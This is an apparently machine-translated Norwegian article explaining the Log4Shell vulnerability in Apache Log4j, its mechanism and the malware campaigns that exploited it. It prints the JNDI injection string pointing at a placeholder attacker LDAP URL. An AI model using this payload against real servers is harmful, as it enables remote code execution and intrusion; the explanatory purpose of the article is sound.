Log4Shell-sårbarhet

10. desember 2021 ble en utnyttelse for en kritisk sårbarhet i den Java-baserte loggingsplattformen Apache Log4j utgitt.offentlig. Sporet som CVE-2021-44228 eller Log4Shell, påvirker sårbarheten Log4j-versjoner fra Log4j 2.0-beta9 og opp til 2.14.1. Trusselaktører kan dra nytte av utnyttelsen for å etablere uautentisert ekstern tilgang, kjøre kode, levere skadevaretrusler eller samle inn informasjon. Sårbarheten tildeles en kritisk status da Log4j er mye brukt av bedriftsapplikasjoner og skytjenester.

Log4Shell tekniske detaljer

Utnyttelsen begynner med at trusselaktøren endrer nettleserens brukeragent. Deretter besøker de et nettsted eller søker etter en bestemt streng som finnes på nettsteder med formatet:

${jndi:ldap://[attacker_URL]}

Som et resultat vil strengen bli lagt til i webserverens tilgangslogger. Angriperne venter deretter på at Log4j-applikasjonen skal analysere disse loggene og nå den vedlagte strengen. I dette tilfellet vil feilen utløses, noe som får serveren til å ringe tilbake til URL-en som finnes i JNDI-strengen. Denne URL-en blir misbrukt til å håndtere Base64-kodede kommandoer eller Java-klasserderetter og utfør dem på den kompromitterte enheten.

Apache ga raskt ut en ny versjon - Log4j 2.15.0, for å adressere og fikse utnyttelsen, men en betydelig mengde sårbare systemer kan forbli uoppdatert i en lang periode. Samtidig la trusselaktører raskt merke til Log4Shell zero-day-sårbarheten og begynte å skanne etter passende servere å utnytte. Infosec-fellesskapet har sporet en rekke angrepskampanjer som bruker Log4Shell for å levere en lang rekke malware-trusler.

Log4Shell brukes i Cryptominer, Botnet, Backdoor og datainnsamlingsangrep

En av de første trusselaktørene som implementerte Log4Shell i sine operasjoner var nettkriminelle bak Kinsing- kryptogruve-botnettet. Hackerne brukte Log4Shell til å levere Base64-kodede nyttelaster og kjøre shell-skript. Rollen til disse skriptene er å rense det målrettede systemet fra konkurrerende kryptogruve-trusler før deres egen Kinsing-malware blir utført.

Netlab 360 oppdaget trusselaktører med sårbarhet å installere versjoner av Mirai og Muhstik botnett på de brytes enheter. Disse skadelige truslene er utformet for å legge til infiserte systemer i et nettverk av IoT-enheter og servere, som angriperne deretter kan instruere til å starte DDoS-angrep (Distributed Denial-of-Service) eller distribuere kryptominerei ettertid.

I følge Microsoft Threat Intelligence Center var Log4j-utnyttelsen også målrettet av angrepskampanjer som droppet Cobalt Strike-fyrtårn. Cobalt Strike er et legitimt programvareverktøy som brukes til penetrasjonstesting mot et selskaps sikkerhetssystemer.Imidlertid har bakdørsfunksjonene gjort det til en vanlig del av arsenalet til en rekke trusselaktørgrupper. Etterpå blir den ulovlige bakdørstilgangen til offerets nettverk brukt til å levere nyttelaster i neste trinn som løsepengeprogramvare, info-tyvere og andre skadelige trusler.

Log4Shell kan utnyttes til å skaffe miljøvariabler som inneholder serverdata. På denne måten kan angripere få tilgang til vertens navn, OS-navnet, OS-versjonsnummeret, brukernavnet som Log4j-tjenesten kjører under og mer.